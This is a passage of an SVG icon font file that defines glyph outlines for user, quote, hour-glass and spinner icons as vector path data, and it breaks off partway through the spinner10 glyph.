<glyph unicode="&#xedc0;" glyph-name="user-minus" d="M384 224c0 151.234 95.874 280.486 230.032 330.2 16.28 36.538 25.968 77.164 25.968 117.8 0 159.058 0 288-192 288s-192-128.942-192-288c0-99.060 57.502-198.104 128-237.832v-52.78c-217.102-17.748-384-124.42-384-253.388h397.306c-8.664 30.53-13.306 62.732-13.306 96zM736 512c-159.058 0-288-128.942-288-288s128.942-288 288-288c159.056 0 288 128.942 288 288s-128.942 288-288 288zM896 192h-320v64h320v-64z" />
<glyph unicode="&#xedc1;" glyph-name="user-check" d="M960 352l-288-288-96 96-64-64 160-160 352 352zM448 192h320v115.128c-67.22 39.2-156.308 66.11-256 74.26v52.78c70.498 39.728 128 138.772 128 237.832 0 159.058 0 288-192 288s-192-128.942-192-288c0-99.060 57.502-198.104 128-237.832v-52.78c-217.102-17.748-384-124.42-384-253.388h448v64z" />
<glyph unicode="&#xedc2;" glyph-name="user-tie" d="M320 768c0 106.039 85.961 192 192 192s192-85.961 192-192c0-106.039-85.961-192-192-192s-192 85.961-192 192zM768.078 512h-35.424l-199.104-404.244 74.45 372.244-96 96-96-96 74.45-372.244-199.102 404.244h-35.424c-127.924 0-127.924-85.986-127.924-192v-320h768v320c0 106.014 0 192-127.922 192z" />
<glyph unicode="&#xedc3;" glyph-name="quotes-left" d="M225 512c123.712 0 224-100.29 224-224 0-123.712-100.288-224-224-224s-224 100.288-224 224l-1 32c0 247.424 200.576 448 448 448v-128c-85.474 0-165.834-33.286-226.274-93.726-11.634-11.636-22.252-24.016-31.83-37.020 11.438 1.8 23.16 2.746 35.104 2.746zM801 512c123.71 0 224-100.29 224-224 0-123.712-100.29-224-224-224s-224 100.288-224 224l-1 32c0 247.424 200.576 448 448 448v-128c-85.474 0-165.834-33.286-226.274-93.726-11.636-11.636-22.254-24.016-31.832-37.020 11.44 1.8 23.16 2.746 35.106 2.746z" />
<glyph unicode="&#xedc4;" glyph-name="quotes-right" d="M800 320c-123.712 0-224 100.29-224 224 0 123.712 100.288 224 224 224s224-100.288 224-224l1-32c0-247.424-200.576-448-448-448v128c85.474 0 165.834 33.286 226.274 93.726 11.634 11.636 22.252 24.016 31.83 37.020-11.438-1.8-23.16-2.746-35.104-2.746zM224 320c-123.71 0-224 100.29-224 224 0 123.712 100.29 224 224 224s224-100.288 224-224l1-32c0-247.424-200.576-448-448-448v128c85.474 0 165.834 33.286 226.274 93.726 11.636 11.636 22.254 24.016 31.832 37.020-11.44-1.8-23.16-2.746-35.106-2.746z" />
<glyph unicode="&#xedc5;" glyph-name="hour-glass" d="M728.992 448c137.754 87.334 231.008 255.208 231.008 448 0 21.676-1.192 43.034-3.478 64h-889.042c-2.29-20.968-3.48-42.326-3.48-64 0-192.792 93.254-360.666 231.006-448-137.752-87.334-231.006-255.208-231.006-448 0-21.676 1.19-43.034 3.478-64h889.042c2.288 20.966 3.478 42.324 3.478 64 0.002 192.792-93.252 360.666-231.006 448zM160 0c0 186.912 80.162 345.414 224 397.708v100.586c-143.838 52.29-224 210.792-224 397.706v0h704c0-186.914-80.162-345.416-224-397.706v-100.586c143.838-52.294 224-210.796 224-397.708h-704zM619.626 290.406c-71.654 40.644-75.608 93.368-75.626 125.366v64.228c0 31.994 3.804 84.914 75.744 125.664 38.504 22.364 71.808 56.348 97.048 98.336h-409.582c25.266-42.032 58.612-76.042 97.166-98.406 71.654-40.644 75.606-93.366 75.626-125.366v-64.228c0-31.992-3.804-84.914-75.744-125.664-72.622-42.18-126.738-125.684-143.090-226.336h501.67c-16.364 100.708-70.53 184.248-143.212 226.406z" />
<glyph unicode="&#xedc6;" glyph-name="spinner" d="M384 832c0 70.692 57.308 128 128 128s128-57.308 128-128c0-70.692-57.308-128-128-128s-128 57.308-128 128zM655.53 719.53c0 70.692 57.308 128 128 128s128-57.308 128-128c0-70.692-57.308-128-128-128s-128 57.308-128 128zM832 448c0 35.346 28.654 64 64 64s64-28.654 64-64c0-35.346-28.654-64-64-64s-64 28.654-64 64zM719.53 176.47c0 35.346 28.654 64 64 64s64-28.654 64-64c0-35.346-28.654-64-64-64s-64 28.654-64 64zM448.002 64c0 0 0 0 0 0 0 35.346 28.654 64 64 64s64-28.654 64-64c0 0 0 0 0 0 0-35.346-28.654-64-64-64s-64 28.654-64 64zM176.472 176.47c0 0 0 0 0 0 0 35.346 28.654 64 64 64s64-28.654 64-64c0 0 0 0 0 0 0-35.346-28.654-64-64-64s-64 28.654-64 64zM144.472 719.53c0 0 0 0 0 0 0 53.019 42.981 96 96 96s96-42.981 96-96c0 0 0 0 0 0 0-53.019-42.981-96-96-96s-96 42.981-96 96zM56 448c0 39.765 32.235 72 72 72s72-32.235 72-72c0-39.765-32.235-72-72-72s-72 32.235-72 72z" />
<glyph unicode="&#xedc7;" glyph-name="spinner2" d="M1024 448c-1.278 66.862-15.784 133.516-42.576 194.462-26.704 61-65.462 116.258-113.042 161.92-47.552 45.696-103.944 81.82-164.984 105.652-61.004 23.924-126.596 35.352-191.398 33.966-64.81-1.282-129.332-15.374-188.334-41.356-59.048-25.896-112.542-63.47-156.734-109.576-44.224-46.082-79.16-100.708-102.186-159.798-23.114-59.062-34.128-122.52-32.746-185.27 1.286-62.76 14.964-125.148 40.134-182.206 25.088-57.1 61.476-108.828 106.11-151.548 44.61-42.754 97.472-76.504 154.614-98.72 57.118-22.304 118.446-32.902 179.142-31.526 60.708 1.29 120.962 14.554 176.076 38.914 55.15 24.282 105.116 59.48 146.366 102.644 41.282 43.14 73.844 94.236 95.254 149.43 13.034 33.458 21.88 68.4 26.542 103.798 1.246-0.072 2.498-0.12 3.762-0.12 35.346 0 64 28.652 64 64 0 1.796-0.094 3.572-0.238 5.332h0.238zM922.306 278.052c-23.472-53.202-57.484-101.4-99.178-141.18-41.67-39.81-91-71.186-144.244-91.79-53.228-20.678-110.29-30.452-166.884-29.082-56.604 1.298-112.596 13.736-163.82 36.474-51.25 22.666-97.684 55.49-135.994 95.712-38.338 40.198-68.528 87.764-88.322 139.058-19.87 51.284-29.228 106.214-27.864 160.756 1.302 54.552 13.328 108.412 35.254 157.69 21.858 49.3 53.498 93.97 92.246 130.81 38.73 36.868 84.53 65.87 133.874 84.856 49.338 19.060 102.136 28.006 154.626 26.644 52.5-1.306 104.228-12.918 151.562-34.034 47.352-21.050 90.256-51.502 125.624-88.782 35.396-37.258 63.21-81.294 81.39-128.688 18.248-47.392 26.782-98.058 25.424-148.496h0.238c-0.144-1.76-0.238-3.536-0.238-5.332 0-33.012 24.992-60.174 57.086-63.624-6.224-34.822-16.53-68.818-30.78-100.992z" />
<glyph unicode="&#xedc8;" glyph-name="spinner3" d="M512 656.904c-32.964 0-59.686 26.724-59.686 59.686v179.060c0 32.964 26.722 59.686 59.686 59.686 32.962 0 59.688-26.722 59.688-59.686v-179.060c0-32.964-26.726-59.686-59.688-59.686zM512-36.956c-20.602 0-37.304 16.702-37.304 37.304v179.060c0 20.602 16.702 37.304 37.304 37.304 20.604 0 37.304-16.704 37.304-37.304v-179.060c0-20.602-16.7-37.304-37.304-37.304zM377.756 624.64c-19.34 0-38.146 10.034-48.512 27.988l-89.53 155.070c-15.452 26.764-6.282 60.986 20.482 76.438 26.762 15.45 60.986 6.284 76.438-20.482l89.53-155.072c15.452-26.764 6.282-60.986-20.482-76.438-8.81-5.084-18.432-7.504-27.926-7.504zM735.856 26.744c-11.602 0-22.886 6.022-29.108 16.792l-89.53 155.070c-9.27 16.056-3.77 36.592 12.29 45.864 16.056 9.264 36.59 3.77 45.864-12.292l89.532-155.068c9.27-16.058 3.768-36.592-12.292-45.864-5.286-3.048-11.060-4.502-16.756-4.502zM279.344 530.060c-8.86 0-17.838 2.256-26.064 7.006l-155.072 89.53c-24.978 14.422-33.538 46.362-19.116 71.342 14.42 24.978 46.364 33.538 71.342 19.116l155.070-89.53c24.98-14.422 33.538-46.362 19.116-71.34-9.668-16.756-27.226-26.124-45.276-26.124zM899.648 194.326c-5.064 0-10.196 1.29-14.894 4.004l-155.068 89.53c-14.274 8.24-19.164 26.494-10.924 40.768 8.242 14.276 26.496 19.166 40.766 10.924l155.070-89.532c14.274-8.24 19.164-26.492 10.924-40.766-5.53-9.574-15.562-14.928-25.874-14.928zM243.41 399.504h-179.060c-26.784 0-48.496 21.712-48.496 48.496s21.712 48.496 48.496 48.496h179.060c26.784 0 48.496-21.712 48.496-48.496s-21.712-48.496-48.496-48.496zM959.65 418.156c-0.002 0 0 0 0 0h-179.060c-16.482 0.002-29.844 13.364-29.844 29.844s13.364 29.844 29.844 29.844c0.002 0 0 0 0 0h179.060c16.482 0 29.844-13.362 29.844-29.844 0-16.48-13.364-29.844-29.844-29.844zM124.366 179.402c-15.472 0-30.518 8.028-38.81 22.39-12.362 21.41-5.026 48.79 16.384 61.148l155.072 89.532c21.41 12.368 48.79 5.028 61.15-16.384 12.362-21.412 5.026-48.79-16.384-61.15l-155.072-89.53c-7.050-4.070-14.748-6.006-22.34-6.006zM744.632 552.448c-10.314 0-20.346 5.352-25.874 14.926-8.24 14.274-3.35 32.526 10.924 40.768l155.070 89.528c14.272 8.236 32.526 3.352 40.768-10.922 8.24-14.274 3.35-32.526-10.924-40.768l-155.070-89.528c-4.7-2.714-9.83-4.004-14.894-4.004zM288.136 19.284c-6.962 0-14.016 1.774-20.48 5.504-19.626 11.332-26.35 36.428-15.020 56.054l89.53 155.070c11.33 19.628 36.426 26.352 56.054 15.022 19.626-11.332 26.35-36.43 15.020-56.054l-89.53-155.072c-7.598-13.166-21.392-20.524-35.574-20.524zM646.266 650.758c-5.062 0-10.196 1.29-14.894 4.002-14.274 8.242-19.164 26.494-10.924 40.766l89.534 155.070c8.24 14.274 26.492 19.166 40.766 10.922 14.274-8.242 19.164-26.494 10.924-40.766l-89.532-155.070c-5.53-9.57-15.56-14.924-25.874-14.924z" />
<glyph unicode="&#xedc9;" glyph-name="spinner4" d="M192 448c0 12.18 0.704 24.196 2.030 36.022l-184.98 60.104c-5.916-31.14-9.050-63.264-9.050-96.126 0-147.23 62.166-279.922 161.654-373.324l114.284 157.296c-52.124 56.926-83.938 132.758-83.938 216.028zM832 448c0-83.268-31.812-159.102-83.938-216.028l114.284-157.296c99.488 93.402 161.654 226.094 161.654 373.324 0 32.862-3.132 64.986-9.048 96.126l-184.98-60.104c1.324-11.828 2.028-23.842 2.028-36.022zM576 761.592c91.934-18.662 169.544-76.742 214.45-155.826l184.978 60.102c-73.196 155.42-222.24 268.060-399.428 290.156v-194.432zM233.55 605.768c44.906 79.084 122.516 137.164 214.45 155.826v194.43c-177.188-22.096-326.23-134.736-399.426-290.154l184.976-60.102zM644.556 156.672c-40.39-18.408-85.272-28.672-132.556-28.672s-92.166 10.264-132.554 28.67l-114.292-157.31c73.206-40.366 157.336-63.36 246.846-63.36s173.64 22.994 246.848 63.36l-114.292 157.312z" />
<glyph unicode="&#xedca;" glyph-name="spinner5" d="M512 960c-282.77 0-512-229.23-512-512s229.23-512 512-512 512 229.23 512 512-229.23 512-512 512zM512 704c141.384 0 256-114.616 256-256s-114.616-256-256-256-256 114.616-256 256 114.616 256 256 256zM817.47 142.53c-81.594-81.594-190.080-126.53-305.47-126.53-115.392 0-223.876 44.936-305.47 126.53s-126.53 190.078-126.53 305.47c0 115.39 44.936 223.876 126.53 305.47l67.882-67.882c0 0 0 0 0 0-131.006-131.006-131.006-344.17 0-475.176 63.462-63.462 147.838-98.412 237.588-98.412 89.748 0 174.124 34.95 237.588 98.412 131.006 131.006 131.006 344.168 0 475.176l67.882 67.882c81.594-81.594 126.53-190.080 126.53-305.47 0-115.392-44.936-223.876-126.53-305.47z" />
<glyph unicode="&#xedcb;" glyph-name="spinner6" d="M384 832c0 70.692 57.308 128 128 128s128-57.308 128-128c0-70.692-57.308-128-128-128s-128 57.308-128 128zM790.994 448c0 0 0 0 0 0 0 57.993 47.013 105.006 105.006 105.006s105.006-47.013 105.006-105.006c0 0 0 0 0 0 0-57.993-47.013-105.006-105.006-105.006s-105.006 47.013-105.006 105.006zM688.424 176.47c0 52.526 42.58 95.106 95.106 95.106s95.106-42.58 95.106-95.106c0-52.526-42.58-95.106-95.106-95.106s-95.106 42.58-95.106 95.106zM425.862 64c0 47.573 38.565 86.138 86.138 86.138s86.138-38.565 86.138-86.138c0-47.573-38.565-86.138-86.138-86.138s-86.138 38.565-86.138 86.138zM162.454 176.47c0 43.088 34.93 78.018 78.018 78.018s78.018-34.93 78.018-78.018c0-43.088-34.93-78.018-78.018-78.018s-78.018 34.93-78.018 78.018zM57.338 448c0 39.026 31.636 70.662 70.662 70.662s70.662-31.636 70.662-70.662c0-39.026-31.636-70.662-70.662-70.662s-70.662 31.636-70.662 70.662zM176.472 719.528c0 0 0 0 0 0 0 35.346 28.654 64 64 64s64-28.654 64-64c0 0 0 0 0 0 0-35.346-28.654-64-64-64s-64 28.654-64 64zM899.464 719.528c0-64.024-51.906-115.934-115.936-115.934-64.024 0-115.936 51.91-115.936 115.934 0 64.032 51.912 115.934 115.936 115.934 64.030 0 115.936-51.902 115.936-115.934z" />
<glyph unicode="&#xedcc;" glyph-name="spinner7" d="M416 32c0 53.019 42.981 96 96 96s96-42.981 96-96c0-53.019-42.981-96-96-96s-96 42.981-96 96zM0 448c0 53.019 42.981 96 96 96s96-42.981 96-96c0-53.019-42.981-96-96-96s-96 42.981-96 96zM832 448c0 53.019 42.981 96 96 96s96-42.981 96-96c0-53.019-42.981-96-96-96s-96 42.981-96 96zM121.844 742.156c0 53.019 42.981 96 96 96s96-42.981 96-96c0-53.019-42.981-96-96-96s-96 42.981-96 96zM710.156 153.844c0 53.019 42.981 96 96 96s96-42.981 96-96c0-53.019-42.981-96-96-96s-96 42.981-96 96zM121.844 153.844c0 53.019 42.981 96 96 96s96-42.981 96-96c0-53.019-42.981-96-96-96s-96 42.981-96 96zM710.156 742.156c0 53.019 42.981 96 96 96s96-42.981 96-96c0-53.019-42.981-96-96-96s-96 42.981-96 96z" />
<glyph unicode="&#xedcd;" glyph-name="spinner8" d="M512-64c-136.76 0-265.334 53.258-362.040 149.96-96.702 96.706-149.96 225.28-149.96 362.040 0 96.838 27.182 191.134 78.606 272.692 50 79.296 120.664 143.372 204.356 185.3l43-85.832c-68.038-34.084-125.492-86.186-166.15-150.67-41.746-66.208-63.812-142.798-63.812-221.49 0-229.382 186.618-416 416-416s416 186.618 416 416c0 78.692-22.066 155.282-63.81 221.49-40.66 64.484-98.114 116.584-166.15 150.67l43 85.832c83.692-41.928 154.358-106.004 204.356-185.3 51.422-81.558 78.604-175.854 78.604-272.692 0-136.76-53.258-265.334-149.96-362.040-96.706-96.702-225.28-149.96-362.040-149.96z" />
<glyph unicode="&#xedce;" glyph-name="spinner9" d="M512 960c-278.748 0-505.458-222.762-511.848-499.974 5.92 241.864 189.832 435.974 415.848 435.974 229.75 0 416-200.576 416-448 0-53.020 42.98-96 96-96s96 42.98 96 96c0 282.77-229.23 512-512 512zM512-64c278.748 0 505.458 222.762 511.848 499.974-5.92-241.864-189.832-435.974-415.848-435.974-229.75 0-416 200.576-416 448 0 53.020-42.98 96-96 96s-96-42.98-96-96c0-282.77 229.23-512 512-512z" />
<glyph unicode="&#xedcf;" glyph-name="spinner10" d="M0.042 446.382l-0.022-0.004c0 0 0.012-0.090 0.028-0.222 0.11-3.878 0.55-7.676 1.322-11.352 0.204-1.746 0.428-3.66 0.674-5.774 0.222-1.886 0.46-3.914 0.718-6.078 0.374-2.566 0.77-5.292 1.19-8.176 0.856-5.746 1.8-12.124 2.908-18.958 1.348-6.446 2.804-13.414 4.364-20.864 0.71-3.718 1.776-7.504 2.786-11.406 1.024-3.89 2.078-7.894 3.16-12.004 0.566-2.042 1.040-4.132 1.708-6.208 0.656-2.074 1.32-4.176 1.988-6.3 1.348-4.234 2.726-8.566 4.136-12.988 0.352-1.106 0.708-2.21 1.064-3.324 0.408-1.102 0.814-2.208 1.226-3.316 0.826-2.218 1.658-4.458 2.502-6.714 1.696-4.496 3.422-9.078 5.18-13.742 1.968-4.566 3.97-9.214 6.004-13.934 1.018-2.348 2.044-4.714 3.078-7.098 1.048-2.376 2.27-4.704 3.408-7.074 2.322-4.714 4.678-9.496 7.062-14.332 2.47-4.786 5.208-9.512 7.846-14.328 1.336-2.398 2.68-4.808 4.028-7.23 1.368-2.41 2.902-4.75 4.356-7.14 2.95-4.738 5.93-9.524 8.934-14.348 12.64-18.894 26.676-37.566 42.21-55.278 15.712-17.578 32.726-34.25 50.692-49.602 18.18-15.136 37.264-28.902 56.726-41.114 19.604-12.036 39.644-22.312 59.376-31.144 5.004-2.040 9.964-4.062 14.878-6.066 2.462-0.972 4.868-2.032 7.336-2.918 2.47-0.868 4.93-1.734 7.376-2.594 4.898-1.684 9.678-3.468 14.484-4.992 4.832-1.43 9.604-2.844 14.312-4.242 2.356-0.672 4.66-1.426 7.004-2.012 2.346-0.574 4.676-1.14 6.986-1.704 4.606-1.118 9.142-2.214 13.604-3.296 4.5-0.868 8.926-1.722 13.27-2.558 2.166-0.41 4.31-0.82 6.434-1.222 1.062-0.2 2.118-0.398 3.166-0.598 1.060-0.148 2.118-0.292 3.166-0.442 4.192-0.582 8.292-1.152 12.3-1.71 1.998-0.274 3.972-0.546 5.922-0.816 1.946-0.286 3.904-0.378 5.814-0.57 3.822-0.336 7.544-0.664 11.164-0.98 3.616-0.304 7.104-0.688 10.526-0.738 0.23-0.008 0.452-0.016 0.682-0.026 0.614-34.812 29.008-62.846 63.968-62.846 0.542 0 1.080 0.028 1.62 0.042v-0.022c0 0 0.090 0.012 0.224 0.028 3.878 0.11 7.674 0.55 11.35 1.322 1.748 0.204 3.662 0.426 5.776 0.672 1.884 0.222 3.912 0.462 6.076 0.718 2.566 0.376 5.292 0.772 8.176 1.192 5.746 0.856 12.124 1.8 18.958 2.908 6.446 1.348 13.414 2.804 20.864 4.362 3.718 0.712 7.504 1.778 11.406 2.786 3.892 1.026 7.894 2.080 12.004 3.162 2.044 0.566 4.132 1.040 6.208 1.708 2.074 0.656 4.174 1.318 6.3 1.988 4.232 1.348 8.564 2.726 12.988 4.134 1.104 0.354 2.21 0.708 3.324 1.066 1.1 0.406 2.206 0.814 3.316 1.226 2.216 0.824 4.456 1.658 6.714 2.5 4.496 1.698 9.078 3.424 13.74 5.182 4.568 1.968 9.216 3.97 13.936 6.004 2.348 1.018 4.714 2.044 7.098 3.078 2.376 1.048 4.702 2.27 7.074 3.408 4.714 2.322 9.494 4.678 14.33 7.062 4.786 2.47 9.512 5.208 14.328 7.846 2.398 1.336 4.808 2.678 7.23 4.028 2.41 1.366 4.75 2.9 7.14 4.354 4.738 2.952 9.524 5.93 14.35 8.936 18.89 12.64 37.564 26.674 55.278 42.21 17.574 15.712 34.248 32.726 49.602 50.69 15.136 18.182 28.902 37.264 41.112 56.728 12.036 19.602 22.314 39.644 31.142 59.376 2.042 5.002 4.062 9.964 6.068 14.878 0.974 2.462 2.032 4.868 2.918 7.334 0.87 2.472 1.732 4.932 2.592 7.376 1.686 4.898 3.468 9.678 4.994 14.484 1.432 4.832 2.846 9.604 4.24 14.31 0.674 2.358 1.43 4.66 2.016 7.004 0.57 2.348 1.138 4.676 1.702 6.988 1.118 4.606 2.216 9.14 3.296 13.602 0.868 4.502 1.72 8.928 2.558 13.272 0.41 2.164 0.818 4.308 1.222 6.434 0.2 1.060 0.398 2.116 0.596 3.164 0.148 1.062 0.296 2.118 0.444 3.168 0.582 4.19 1.152 8.292 1.708 12.3 0.278 1.996 0.55 3.97 0.82 5.922 0.284 1.946 0.376 3.902 0.568 5.812 0.336 3.822 0.664 7.546 0.98 11.164 0.304 3.616 0.686 7.106 0.738 10.528 0.020 0.534 0.040 1.044 0.058 1.574 35.224 0.146 63.732 28.738 63.732 63.992 0 0.542-0.028 1.080-0.042 1.62h0.022c0 0-0.012 0.090-0.028 0.224-0.11 3.878-0.55 7.674-1.322 11.35-0.204 1.748-0.428 3.662-0.674 5.776-0.222 1.886-0.46 3.914-0.718 6.076-0.374 2.566-0.77 5.294-1.19 8.176-0.856 5.746-1.8 12.124-2.908 18.958-1.348 6.444-2.804 13.414-4.364 20.862-0.71 3.72-1.776 7.506-2.786 11.408-1.024 3.892-2.078 7.894-3.16 12.002-0.566 2.044-1.040 4.134-1.708 6.208-0.656 2.076-1.32 4.174-1.988 6.3-1.348 4.234-2.726 8.566-4.136 12.99-0.352 1.102-0.708 2.21-1.064 3.324-0.408 1.1-0.814 2.206-1.226 3.316-0.826 2.216-1.658 4.454-2.502 6.714-1.696 4.498-3.422 9.080-5.18 13.74-1.968 4.57-3.97 9.216-6.004 13.936-1.020 2.348-2.044 4.714-3.078 7.098-1.048 2.376-2.27 4.702-3.408 7.076-2.322 4.714-4.678 9.494-7.062 14.33-2.47 4.786-5.208 9.512-7.846 14.328-1.336 2.398-2.68 4.808-4.028 7.23-1.368 2.41-2.902 4.75-4.356 7.14-2.95 4.74-5.93 9.524-8.934 14.35-12.64 18.892-26.676 37.564-42.21 55.278-15.712 17.576-32.726 34.25-50.692 49.602-18.18 15.136-37.264 28.902-56.726 41.112-19.604 12.036-39.644 22.314-59.376 31.142-5.004 2.040-9.964 4.062-14.878 6.068-2.462 0.974-4.868 2.032-7.336 2.918-2.47 0.87-4.93 1.734-7.376 2.592-4.898 1.684-9.678 3.468-14.484 4.994-4.832 1.432-9.604 2.846-14.312 4.242-2.356 0.672-4.66 1.428-7.004 2.014-2.346 0.572-4.676 1.138-6.986 1.702-4.606 1.118-9.142 2.216-13.604 3.298-4.5 0.868-8.926 1.72-13.27 2.558-2.166 0.412-4.31 0.82-6.434 1.222-1.062 0.2-2.118 0.398-3.166 0.596-1.060 0.148-2.118 0.296-3.166 0.442-4.192 0.584-8.292 1.154-12.3 1.71-1.998 0.276-3.972 0.55-5.922 0.82-1.946 0.284-3.904 0.376-5.814 0.57-3.822 0.336-7.544 0.664-11.164 0.98-3.616 0.304-7.104 0.686-10.526 0.738-0.852 0.032-1.674 0.062-2.512 0.092-0.65 34.78-29.028 62.778-63.966 62.778-0.542 0-1.080-0.028-1.62-0.042l-0.002 0.022c0 0-0.090-0.012-0.222-0.028-3.878-0.11-7.676-0.55-11.352-1.322-1.748-0.204-3.662-0.426-5.776-0.672-1.884-0.222-3.912-0.462-6.076-0.718-2.566-0.376-5.292-0.772-8.176-1.192-5.746-0.856-12.124-1.8-18.958-2.908-6.446-1.348-13.414-2.804-20.864-4.362-3.718-0.712-7.504-1.778-11.406-2.786-3.892-1.026-7.894-2.080-12.004-3.162-2.044-0.566-4.132-1.040-6.208-1.708-2.074-0.656-4.174-1.318-6.3-1.988-4.232-1.348-8.564-2.726-12.988-4.134-1.104-0.354-2.21-0.708-3.324-1.066-1.1-0.406-2.206-0.814-3.316-1.226-2.216-0.824-4.456-1.658-6.714-2.5-4.496-1.698-9.078-3.424-13.74-5.182-4.568-1.968-9.216-3.97-13.936-6.004-2.348-1.018-4.714-2.044-7.098-3.078-2.376-1.048-4.702-2.27-7.074-3.408-4.714-2.322-9.494-4.678-14.33-7.062-4.786-2.47-9.512-5.208-14.328-7.846-2.398-1.336-4.808-2.678-7.23-4.028-2.41-1.366-4.75-2.9-7.14-4.354-4.738-2.952-9.524-5.93-14.35-8.936-18.89-12.64-37.564-26.674-55.278-42.21-17.574-15.712-34.248-32.726-49.602-50.69-15.136-18.182-28.902-37.264-41.112-56.728-12.036-19.602-22.314-39.644-31.142-59.376-2.042-5.002-4.062-9.964-6.068-14.878-0.974-2.462-2.032-4.868-2.918-7.334-0.87-2.472-1.732-4.932-2.592-7.376-1.686-4.898-3.468-9.678-4.994-14.484-1.432-4.832-2.846-9.604-4.24-14.31-0.674-2.358-1.43-4.66-2.016-7.004-0.57-2.348-1.138-4.676-1.702-6.988-1.118-4.606-2.216-9.14-3.296-13.602-0.868-4.502-1.72-8.928-2.558-13.272-0.41-2.164-0.818-4.308-1.222-6.434-0.2-1.060-0.398-2.116-0.596-3.164-0.148-1.062-0.296-2.118-0.444-3.168-0.582-4.19-1.152-8.292-1.708-12.3-0.278-1.996-0.55-3.97-0.82-5.922-0.284-1.946-0.376-3.902-0.568-5.812-0.336-3.822-0.664-7.546-0.98-11.164-0.304-3.616-0.686-7.106-0.738-10.528-0.020-0.548-0.040-1.076-0.058-1.62-34.376-1.112-61.902-29.304-61.902-63.946 0-0.542 0.028-1.078 0.042-1.618zM73.518 511.294c0.042 0.196 0.086 0.384 0.128 0.58 0.644 3.248 1.632 6.542 2.556 9.942 0.934 3.388 1.894 6.876 2.88 10.454 0.516 1.78 0.934 3.602 1.546 5.406 0.596 1.802 1.202 3.628 1.81 5.476 1.218 3.682 2.464 7.45 3.736 11.294 0.316 0.958 0.634 1.924 0.956 2.892 0.37 0.954 0.74 1.914 1.114 2.876 0.746 1.924 1.5 3.868 2.26 5.83 1.52 3.904 3.070 7.882 4.646 11.93 1.768 3.96 3.566 7.99 5.392 12.080 0.908 2.038 1.824 4.090 2.746 6.156 0.932 2.060 2.036 4.072 3.052 6.126 2.070 4.084 4.17 8.222 6.294 12.412 2.202 4.142 4.654 8.224 6.998 12.392 1.184 2.074 2.374 4.16 3.57 6.256 1.21 2.086 2.586 4.102 3.876 6.166 2.616 4.098 5.256 8.232 7.918 12.402 11.234 16.298 23.632 32.398 37.33 47.638 13.874 15.104 28.842 29.404 44.598 42.548 15.974 12.928 32.686 24.65 49.676 35.022 17.13 10.194 34.6 18.838 51.734 26.258 4.35 1.7 8.662 3.382 12.934 5.050 2.136 0.812 4.216 1.71 6.36 2.444 2.146 0.714 4.28 1.428 6.404 2.136 4.25 1.386 8.382 2.888 12.548 4.142 4.184 1.174 8.314 2.332 12.392 3.474 2.038 0.55 4.026 1.19 6.054 1.662 2.030 0.458 4.044 0.914 6.044 1.368 3.978 0.91 7.896 1.806 11.748 2.688 3.888 0.686 7.71 1.36 11.462 2.022 1.868 0.33 3.716 0.658 5.546 0.98 0.914 0.162 1.824 0.324 2.728 0.484 0.916 0.112 1.828 0.222 2.734 0.332 3.612 0.448 7.148 0.882 10.604 1.31 1.72 0.216 3.422 0.432 5.102 0.644 1.674 0.226 3.364 0.266 5.010 0.408 3.292 0.238 6.498 0.472 9.616 0.7 3.11 0.218 6.11 0.524 9.058 0.508 5.848 0.132 11.32 0.256 16.38 0.372 4.664-0.168 8.948-0.324 12.818-0.462 1.914-0.054 3.726-0.108 5.432-0.156 2.122-0.134 4.108-0.26 5.958-0.378 2.13-0.138 4.060-0.266 5.82-0.38 3.256-0.51 6.592-0.782 9.99-0.782 0.466 0 0.93 0.026 1.396 0.036 0.132-0.008 0.224-0.014 0.224-0.014v0.020c31.14 0.778 56.75 23.784 61.556 53.754 0.542-0.12 1.064-0.236 1.612-0.356 3.246-0.644 6.542-1.632 9.942-2.556 3.386-0.934 6.876-1.894 10.454-2.88 1.778-0.516 3.602-0.934 5.404-1.546 1.802-0.596 3.63-1.202 5.478-1.812 3.68-1.218 7.448-2.464 11.292-3.736 0.96-0.316 1.924-0.634 2.892-0.956 0.956-0.37 1.914-0.74 2.876-1.112 1.926-0.746 3.868-1.5 5.83-2.26 3.904-1.52 7.884-3.070 11.932-4.646 3.96-1.768 7.988-3.566 12.080-5.392 2.038-0.908 4.088-1.824 6.156-2.746 2.060-0.932 4.072-2.036 6.126-3.054 4.082-2.070 8.222-4.17 12.41-6.294 4.144-2.202 8.226-4.654 12.394-6.998 2.074-1.184 4.16-2.374 6.256-3.572 2.086-1.21 4.102-2.586 6.166-3.876 4.098-2.616 8.23-5.256 12.402-7.918 16.296-11.234 32.398-23.632 47.636-37.33 15.104-13.874 29.406-28.842 42.55-44.598 12.928-15.974 24.648-32.686 35.020-49.676 10.196-17.13 18.84-34.6 26.26-51.736 1.698-4.348 3.382-8.662 5.050-12.932 0.812-2.136 1.71-4.216 2.444-6.36 0.714-2.146 1.428-4.28 2.136-6.404 1.386-4.25 2.888-8.384 4.142-12.548 1.174-4.184 2.33-8.316 3.474-12.392 0.55-2.038 1.19-4.026 1.66-6.054 0.46-2.030 0.916-4.046 1.368-6.046 0.91-3.978 1.808-7.896 2.688-11.748 0.688-3.888 1.362-7.71 2.024-11.462 0.33-1.868 0.656-3.716 0.98-5.548 0.162-0.914 0.324-1.824 0.484-2.728 0.11-0.916 0.222-1.828 0.332-2.734 0.446-3.612 0.882-7.148 1.31-10.604 0.216-1.72 0.432-3.42 0.642-5.1 0.226-1.674 0.268-3.364 0.41-5.010 0.238-3.292 0.472-6.498 0.7-9.616 0.218-3.11 0.524-6.11 0.508-9.058 0.132-5.848 0.256-11.32 0.372-16.38-0.168-4.664-0.324-8.948-0.462-12.818-0.054-1.914-0.108-3.726-0.156-5.432-0.134-2.122-0.26-4.108-0.378-5.958-0.138-2.13-0.266-4.060-0.38-5.82-0.498-3.256-0.768-6.592-0.768-9.99 0-0.468 0.026-0.93 0.036-1.396-0.008-0.132-0.016-0.224-0.016-0.224h0.022c0.768-30.766 23.236-56.128 